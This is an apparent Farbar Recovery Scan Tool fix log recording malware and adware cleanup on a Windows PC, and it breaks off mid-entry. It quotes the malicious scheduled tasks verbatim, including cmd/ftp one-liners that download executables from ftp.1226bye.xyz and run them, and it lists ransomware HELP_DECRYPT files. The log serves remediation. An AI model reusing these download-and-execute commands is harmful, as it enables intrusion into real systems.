Fix result of Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01 Ran by SYSTEM (12-02-2019 21:06:27) Run:3 Running from G:\ Boot Mode: Recovery ============================================== fixlist content: ***************** CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [start] => C:\Windows\SysWOW64\scrobj.dll [173568 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION HKLM-x32\...\RunOnce: [!BingBar] => "C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0oemBingBarSetup-Partner.EXE" /C:"BBSetup.exe cabLocation=.\BingBarPartnerConfig.cab ui=false ismu=2" HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP000.TMP\" <==== ATTENTION C:\Users\seb\AppData\Local\Temp\IXP000.TMP HKU\S-1-5-21-538220665-914173731-789976379-1000\...\Run: [SMSetup] => "C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe" /cnid 926458 /fpd /dsie /dsff /dsgc /hp /wait /ntp_ie /ms /restart <==== ATTENTION C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect" SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops FF HKLM-x32\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files (x86)\AVG\AVG2012\Thunderbird => non trouvé(e) FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] C:\Program Files (x86)\AVG CHR NewTab: Default -> Active:"chrome-extension://ejocekekgcaldnmjngfdbmbeebcekelc/newtab.html" CHR HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx 2019-02-11 09:32 - 2019-02-11 09:32 - 000003518 _____ C:\Windows\System32\Tasks\Mysa 2019-02-11 09:32 - 2019-02-11 09:32 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3 2019-02-11 09:32 - 2019-02-11 09:32 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2 2019-02-11 09:32 - 2019-02-11 09:32 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 C:\Users\seb\Desktop\wovhdyxirnjwh.txt 2018-12-20 10:10 - 2018-12-20 10:10 - 002685544 _____ (BitTorrent Inc.) C:\Program Files\BitTorrent.exe 2019-02-02 11:42 - 2015-11-13 18:24 - 000000000 ____D C:\Users\seb\AppData\Roaming\BitTorrent 2018-12-22 10:49 - 2018-12-22 10:49 - 007548656 _____ (AVG Technologies CZ, s.r.o.) C:\Program Files\avg_antivirus_free_setup_a2l.exe 2018-12-20 10:10 - 2018-12-20 10:10 - 002685544 _____ (BitTorrent Inc.) C:\Program Files\BitTorrent.exe C:\Program Files (x86)\hijackthis_hijackthis_2.0.4_anglais_17891.msi 2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.HTML 2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.PNG 2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.TXT 2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.URL 2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.HTML 2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.PNG 2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.TXT 2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.URL 2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.HTML 2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.PNG 2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.TXT 2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.URL 2018-09-22 07:01 - 2018-09-22 07:01 - 000000000 _____ () C:\Users\seb\AppData\Local\{072E71B2-1E8B-4E8A-BF64-AD2534DB2A20} 2018-09-22 07:01 - 2018-09-22 07:01 - 000000000 _____ () C:\Users\seb\AppData\Local\{0C47508B-2ED0-44C2-A325-F3BC8CA08178} 2019-02-05 19:12 - 2019-02-05 19:12 - 000000000 _____ () C:\Users\seb\AppData\Local\{3CB706B5-36BB-4036-B7F1-872CE9B59BE8} 2019-02-05 19:12 - 2019-02-05 19:12 - 000000000 _____ () C:\Users\seb\AppData\Local\{3D0A3C2D-6388-4E53-9EE0-E1215AF28AF0} C:\Windows\SysWOW64\scrobj.dll 2019-02-08 18:48 - 2014-03-12 09:26 - 010168896 _____ (Foxit Corporation) C:\Users\seb\AppData\Local\Temp\Foxit Reader Updater.exe Task: {08166AD7-BC80-4E8A-B3CE-3FB38D87E667} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {5080C933-E97E-44E2-A412-7272318EEC7F} - System32\Tasks\ROC_REG_JAN_DELETE => C:\ProgramData\AVG January 2013 Campaign\ROC.exe (AVG Technologies -> ) Task: {6C997686-58F9-4B03-BE3D-3339C1A0E575} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {9AC69DB8-8F01-4610-AA8F-6ACA64D8F283} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {C6AA86B5-3B75-422F-B62E-B4895E28B2B1} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {E0385589-8F38-4542-8B0A-8B1200B16292} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {ECFA415A-0101-4341-BFC8-6F10A12D27D3} - \{B0782209-B4AC-4BDA-A6B6-04641A0F5499} -> Pas de fichier <==== ATTENTION Task: {F35FC867-404F-448A-AE07-D19A90638CA7} - System32\Tasks\Microsoft\Windows\MemDiag => C:\Windows\system32\mdres.exe (Microsoft Windows -> Microsoft Corporation) Task: C:\Windows\Tasks\ROC_REG_JAN_DELETE.job => C:\ProgramData\AVG January 2013 Campaign\ROC.exe c:\windows\debug\item.dat C:\ProgramData\AVG January 2013 Campaign c:\windows\help\lsmosee.exe c:\windows\update.exe c:\windows\debug\item.dat c:\windows\debug\ok.dat C:\users\seb\appdata\roaming\bittorrent MSCONFIG\Services: PDF Architect Helper Service => 2 MSCONFIG\Services: PDF Architect Service => 2 FirewallRules: [TCP Query User{A878CE2A-4866-4ADF-B0FC-C9E3A95F9A54}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [UDP Query User{80A01F73-46DE-4BD1-BFDB-F4ACC5486581}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [TCP Query User{09C90D83-1B72-4418-A128-955D4F5FC2C4}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe] => (Block) C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe Pas de fichier FirewallRules: [UDP Query User{56468598-4CDA-4B06-883B-F462DCF4DF83}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe] => (Block) C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe Pas de fichier FirewallRules: [TCP Query User{23A13744-E4CC-47A1-9C0B-3545FFB4CE07}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [UDP Query User{E12A5554-9B15-4C5F-8DA6-4430F068D0FA}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe Pas de fichier FirewallRules: [TCP Query User{6EF3DEC1-D583-4B2B-9D57-44CFD06D6E1B}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe Pas de fichier FirewallRules: [UDP Query User{565BA3D9-7E02-4835-BA1D-3F0D263EE900}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe] => (Block) C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe Pas de fichier FirewallRules: [{F53DE6EF-5FA3-44E7-8847-15DF55AD9389}] => (Allow) C:\Users\seb\AppData\Roaming\uTorrent\uTorrent.exe Pas de fichier FirewallRules: [{EAB85AF4-1D06-4A3F-A9E8-D51D8174F170}] => (Allow) C:\Users\seb\AppData\Roaming\uTorrent\uTorrent.exe Pas de fichier FirewallRules: [TCP Query User{E65E1F8A-3A59-4B91-BBCD-96C35F746B00}C:\program files\dvdfab 11\dvdfab64.exe] => (Allow) C:\program files\dvdfab 11\dvdfab64.exe Pas de fichier FirewallRules: [UDP Query User{AFF844F2-60BD-4476-98D6-383EA160A70E}C:\program files\dvdfab 11\dvdfab64.exe] => (Allow) C:\program files\dvdfab 11\dvdfab64.exe Pas de fichier Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011 on the Web.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\boostspeed.url (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\BoostSpeed.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG Rescue Center.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\RescueCenter.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Console Defragmentation.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Defrag.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DiskDefrag.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Doctor.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DiskDoctor.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Wiper.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DiskWiper.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Duplicate File Finder.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\DuplicateFileFinder.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Recovery.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\FileRecovery.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Shredder.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\FileShredder.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Internet Optimizer.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\InternetOptimizer.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Registry Defrag.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\RegistryDefrag.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Rescue Center.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\RescueCenter.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Service Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\ServiceManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Startup Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\StartupManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG System Information.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\SystemInformation.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Task Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\TaskManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Track Eraser.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\TrackEraser.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Tweak Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\TweakManager.exe (Pas de fichier) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Uninstall Manager.lnk -> C:\Program Files (x86)\AVG\AVG PC Tuneup 2011\ProgramManager.exe (Pas de fichier) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011 C:\Program Files (x86)\AVG\AVG PC Tuneup 2011 Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V Enable /T REG_SZ /D n /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V OptimizeComplete /T REG_SZ /D no /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V PowerdownAfterShutdown /T REG_SZ /D 1 /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /V ClearPageFileAtShutdown /T REG_DWORD /D 0 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V MenuShowDelay /T REG_SZ /D 400 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V WaitToKillAppTimeout /T REG_SZ /D 1200 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V HungAppTimeout /T REG_SZ /D 1200 /f Reg: REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V AutoEndTasks /T REG_SZ /D 1 /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /V WaitToKillServiceTimeout /T REG_SZ /D 1200 /f Reg: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /V EnableLUA /T REG_DWORD /D 1 /f cmd: bitsadmin /reset cmd: netsh winsock reset cmd: ipconfig /flushdns EmptyTemp: ***************** Error: Restore point can only be created in normal mode. CloseProcesses: => Error: This directive works only outside recovery mode. "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\start" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\!BingBar" => removed successfully "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\wextract_cleanup0" => removed successfully C:\Users\seb\AppData\Local\Temp\IXP000.TMP => moved successfully "HKU\S-1-5-21-538220665-914173731-789976379-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SMSetup" => not found "C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe" => not found "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir" => not found SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = => Error: The entry should be fixed outside recovery mode. SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops => Error: The entry should be fixed outside recovery mode. SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente => Error: The entry should be fixed outside recovery mode. SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/709-111075-12437-0/4?satitle={searchTerms}&mfe=Desktops => Error: The entry should be fixed outside recovery mode. FF HKLM-x32\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files (x86)\AVG\AVG2012\Thunderbird => non trouvé(e) => Error: The entry should be fixed outside recovery mode. FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] => Error: The entry should be fixed outside recovery mode. FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Pas de fichier] => Error: The entry should be fixed outside recovery mode. "C:\Program Files (x86)\AVG" => not found CHR NewTab: Default -> Active:"chrome-extension://ejocekekgcaldnmjngfdbmbeebcekelc/newtab.html" => Error: The entry should be fixed outside recovery mode. CHR HKU\S-1-5-21-538220665-914173731-789976379-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM-x32\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM\...\Chrome\Extension: [ejocekekgcaldnmjngfdbmbeebcekelc] - hxxps://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx => Error: The entry should be fixed outside recovery mode. C:\Windows\System32\Tasks\Mysa => moved successfully C:\Windows\System32\Tasks\Mysa3 => moved successfully C:\Windows\System32\Tasks\Mysa2 => moved successfully C:\Windows\System32\Tasks\Mysa1 => moved successfully C:\Users\seb\Desktop\wovhdyxirnjwh.txt => moved successfully C:\Program Files\BitTorrent.exe => moved successfully C:\Users\seb\AppData\Roaming\BitTorrent => moved successfully C:\Program Files\avg_antivirus_free_setup_a2l.exe => moved successfully "C:\Program Files\BitTorrent.exe" => not found C:\Program Files (x86)\hijackthis_hijackthis_2.0.4_anglais_17891.msi => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.HTML => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.PNG => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.TXT => moved successfully C:\Users\seb\AppData\Roaming\HELP_DECRYPT.URL => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.HTML => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.PNG => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.TXT => moved successfully C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.URL => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.HTML => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.PNG => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.TXT => moved successfully C:\Users\seb\AppData\Local\HELP_DECRYPT.URL => moved successfully C:\Users\seb\AppData\Local\{072E71B2-1E8B-4E8A-BF64-AD2534DB2A20} => moved successfully C:\Users\seb\AppData\Local\{0C47508B-2ED0-44C2-A325-F3BC8CA08178} => moved successfully C:\Users\seb\AppData\Local\{3CB706B5-36BB-4036-B7F1-872CE9B59BE8} => moved successfully C:\Users\seb\AppData\Local\{3D0A3C2D-6388-4E53-9EE0-E1215AF28AF0} => moved successfully C:\Windows\SysWOW64\scrobj.dll => moved successfully C:\Users\seb\AppData\Local\Temp\Foxit Reader Updater.exe => moved successfully Task: {08166AD7-BC80-4E8A-B3CE-3FB38D87E667} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {5080C933-E97E-44E2-A412-7272318EEC7F} - System32\Tasks\ROC_REG_JAN_DELETE => C:\ProgramData\AVG January 2013 Campaign\ROC.exe (AVG Technologies -> ) => Error: The entry should be fixed outside recovery mode. Task: {6C997686-58F9-4B03-BE3D-3339C1A0E575} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {9AC69DB8-8F01-4610-AA8F-6ACA64D8F283} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {C6AA86B5-3B75-422F-B62E-B4895E28B2B1} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa => Error: The entry should be fixed outside recovery mode. Task: {E0385589-8F38-4542-8B0A-8B1200B16292} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {ECFA415A-0101-4341-BFC8-6F10A12D27D3} - \{B0782209-B4AC-4BDA-A6B6-04641A0F5499} -> Pas de fichier <==== ATTENTION => Error: The entry should be fixed outside recovery mode. Task: {F35FC867-404F-448A-AE07-D19A90638CA7} - System32\Tasks\Microsoft\Windows\MemDiag => C:\Windows\system32\mdres.exe (Microsoft Windows -> Microsoft Corporation) => Error: The entry should be fixed outside recovery mode. Task: C:\Windows\Tasks\ROC_REG_JAN_DELETE.job => C:\ProgramData\AVG January 2013 Campaign\ROC.exe => Error: The entry should be fixed outside recovery mode. c:\windows\debug\item.dat => moved successfully C:\ProgramData\AVG January 2013 Campaign => moved successfully "c:\windows\help\lsmosee.exe" => not found "c:\windows\update.exe" => not found "c:\windows\debug\item.dat" => not found "c:\windows\debug\ok.dat" => not found "C:\users\seb\appdata\roaming\bittorrent" => not found HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\PDF Architect Helper Service => removed successfully "HKLM\System\CurrentControlSet\Services\PDF Architect Helper Service" => not found HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\PDF Architect Service => removed successfully "HKLM\System\CurrentControlSet\Services\PDF Architect Service" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{A878CE2A-4866-4ADF-B0FC-C9E3A95F9A54}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{80A01F73-46DE-4BD1-BFDB-F4ACC5486581}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{09C90D83-1B72-4418-A128-955D4F5FC2C4}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{56468598-4CDA-4B06-883B-F462DCF4DF83}C:\users\seb\bittorrent_7-9-2-build-37251_fr_11039.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{23A13744-E4CC-47A1-9C0B-3545FFB4CE07}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{E12A5554-9B15-4C5F-8DA6-4430F068D0FA}C:\users\seb\appdata\roaming\bittorrent\bittorrent.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{6EF3DEC1-D583-4B2B-9D57-44CFD06D6E1B}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{565BA3D9-7E02-4835-BA1D-3F0D263EE900}C:\users\seb\appdata\roaming\bittorrent\updates\7.9.2_38914.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F53DE6EF-5FA3-44E7-8847-15DF55AD9389}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EAB85AF4-1D06-4A3F-A9E8-D51D8174F170}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E65E1F8A-3A59-4B91-BBCD-96C35F746B00}C:\program files\dvdfab 11\dvdfab64.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{AFF844F2-60BD-4476-98D6-383EA160A70E}C:\program files\dvdfab 11\dvdfab64.exe" => not found C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011 on the Web.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG PC Tuneup 2011.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\AVG Rescue Center.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Console Defragmentation.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Defrag.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Doctor.lnk => moved 